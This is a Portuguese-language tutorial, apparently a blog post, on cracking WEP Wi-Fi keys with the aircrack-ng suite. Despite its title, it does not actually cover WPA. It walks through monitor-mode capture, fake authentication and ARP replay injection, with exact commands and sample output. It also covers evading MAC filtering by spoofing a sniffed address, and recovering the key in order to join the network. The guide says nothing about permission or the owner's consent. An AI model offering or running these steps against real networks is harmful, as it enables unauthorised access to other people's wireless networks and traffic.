Wireless – Como quebrar senhas de redes WEP e WPA

Objetivos:
=========
– Pesquisar o modo que os pacotes são transmitidos pela rede sem fio;
– Localizar uma forma de captar os pacotes através de um sniffer;
– Quebrar a senha WEP / WPA;

Minha pesquisa baseou-se inicialmente no modo em que os pacotes são

enviados pela rede sem fio e de uma possível forma de captar os pacotes. A
partir desse princípio, localizar uma forma de quebrar a criptografia do WEP e
do WPA.

A brincadeira consiste em deixar seu adaptador de rede sem fio no modo de

monitoramento, para que seja capaz de ler os pacotes que estão “voando” e
injetar de volta no AccessPoint gerando tráfego suficiente para a quebra da
chave.

O princípio é o mesmo usado no modo de capturamento de pacotes das redes

que utilizam hub ou os antigos cabos coaxiais: Quem estiver “conectado” pode
checar se aquela informação realmente lhe pertence. Se temos um adaptador
wireless que esteja ao alcance do AccessPoint(AP), podemos verificar os
pacotes.

Nota 1:
Você pode ler meu outro post que fala sobre a criação de uma Cantena ou
Cantenna, usando uma lata de batata pringles, amplificando seu sinal. Para
quem não acredita, realmente funciona.

Nota 2:
Para poder executar os passos aqui citados, sua placa de rede PRECISA TER
SUPORTE AO MODO DE MONITORAMENTO E INJEÇÃO DE PACOTES!

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Nota 3:
Se você tiver que comprar uma placa de rede Wireless, aproveite para achar
uma que tenha conector para acoplar antena externa.

Utilitários:
============
– Notebook rodando Mandriva Linux 2008 (ou qualquer outra distribuição linux)
dentro de uma Virtual Machine [abaixo explico os motivos]
– Aircrack-ng, aireplay, airodump-ng [ http://www.aircrack-ng.org/ ]
– Adaptador Wireless USB GWL-G122 Revisão C [ Ver compatibilidade no site
do Aircrack ]

Por que usar linux ?

Simples: O número de placas que possuem suporte ao modo de
monitoramento e ao modo de injeção de pacotes é muito maior que no
Windows. A maioria dos fabricantes desenvolve drivers que possuem este
modo desabilitado para justamente evitar este tipo de “ataque”.

Por que usar uma Virtual Machine ?

Gosto de simplicidade: Meu notebook está com Windows e o trabalho para
reparticionar o HD e instalar o linux no modo DualBoot não compensa. É mais
simples aproveitar os benefícios da emulação de outro sistema operacional.

Não está no escopo desse post os detalhes da instalação do Linux, mas se

você tiver o VMWare (software responsável por emular SO’s), no próprio site
do Aircrack já tem uma prontinha pra usar.

http://www.aircrack-ng.org/doku.php#virtual_machine1

Quebrando as senhas:
===================

WEP
Mais fácil de quebrar, pois o ataque apesar de usar força bruta, utiliza
estatística e pedaços da chave enviado nos pacotes para acelerar a quebra.

Quanto mais IV’s capturados pelo Aircrack, maior a chance de quebra. IV é um

pacote capturado que pode ser usado para recuperar um pedaço de chave.

Uma dica importante é não ficar esperando a rede enviar IV’s para você e sim
você tentar aumentar o número de capturas com ataques ARP, chopchop e
fragmentação.

Todos os comandos deverão ser rodados em um terminal, logado como root:

1 – Rode o comando abaixo para validar os AccessPoints ativos:

aircrack-ng interface_rede

Localize AccessPoint desejado e pare o comando com ctrl+c. Vamos filtrar a

execução para garantir maior número de pacotes coletados, já que o scan é
feito por canais de 1 a 12.

2 – Filtre a rede desejada por canal / bssid e deixe ele parado rodando.
aircrack-ng -c canal –bssid 00:00:00:00 -w arquivo_saida interface_rede

Onde:
canal = Canal mostrado pelo comando 1
00:00:00:00 = Mac Address do AccessPoint escolhido para o ataque mostrado
no comando 1
arquivo_saida = Nome do arquivo que o aplicativo irá salvar e que será usado
para capturar a senha
interface_rede = Interface wireless usada (wifi0, rausb0, etc)
Note que há colunas mostrando Beacons e IVs.
Podemos considerar Beacons como lixo para o nosso ataque e IVs para os
pacotes que realmente interessam.

Consegui quebrar WEP com 5.000 IVs mas um número bom, gira em torno dos
80.000.

3 – Abra um novo terminal para tentarmos uma autenticação FAKE

aireplay-ng -1 0 -e nome -a bssid -h mac_sua_placa_rede interface_rede

Onde:
nome = ESSID da rede, ou melhor, o nome do AccessPoint que mostra pra
você no comando 1
bssid = BSSID da rede (mac address do AP)
mac_sua_placa_rede = Mac Address da sua placa de rede
interface de rede = interface da rede wifi

Comando exemplo:
aireplay-ng -1 0 -e RedeWireless -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82
rausb0

Se o comando funcionar, você verá um resultado assim:

18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

Mantenha esse terminal aberto para manter a associação falsa.

Nota: Alguns AccessPoints possuem filtro por MAC Address. Caso a

associação não funcione, utilize o tcpdump para achar um MAC que esteja
liberado e troque o MAC da sua placa com o MacChanger.

Um exemplo de execução de tcpdump seria:

tcpdump -n -e -s0 -vvv -i interface_rede

4 – Execução dos ataques

4.1 – Abra um novo terminal e execute o aireplay para tentar gerar replicação
de pacote ARP
aireplay-ng -3 -b bssid -h mac_sua_placa interface_rede

Onde:
-3 = é o tipo de ataque ARP
bssid = Mac do AccessPoint
mac_sua_placa = Mac Address da sua placa de rede
interface_rede = Interface da rede wifi
Deixe o terminal parado por alguns minutos. Esse comando precisa de alguns
pacotes ARP na rede para gerar o tráfego. Um usuário conectado com cabo no
AP é suficiente para o ataque funcionar.

Exemplo de um comando que está executando com sucesso:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets…

Se funcionar, você verá o número de IVs crescer absurdamente. Pare os

comandos quando estiver com +- 80.000 IVs e pule para o passo 5.

5 – Descubra a chave
aircrack-ng -b bssid arquivo*.cap

Onde:
bssid = Mac do AccessPoint que está ativo capturando pacotes
arquivo*.cap = Prefixo do arquivo colocado no comando 1

Se tudo der certo, aparecerá no meio da tela:

KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%

Você nunca achará a chave original e sempre a chave em hexa. Remova os

dois pontos “:” e tente conectar na rede. Bingo!!

6 – Se algo saiu errado..

Essa é a maneira mais fácil de conseguir a quebra. Há uma infinidade de jeitos
de tentar gerar tráfego e IVs. Aqui vão alguns links que ajudarão a entender
mais sobre os ataques:

[Forma simples de crackear]

http://www.aircrack-ng.org/doku.php?id=simple_wep_crack&s=simple%20wep
%20crack

[Formas de aumentar os IVs]

http://www.aircrack-ng.org/doku.php?
id=i_am_injecting_but_the_ivs_don_t_increase

[Post no Warchalking]
http://capivara.warchalking.com.br/forum/viewtopic.php?
p=8826&sid=598caa58d4ae9c0fdfe079be733bca4a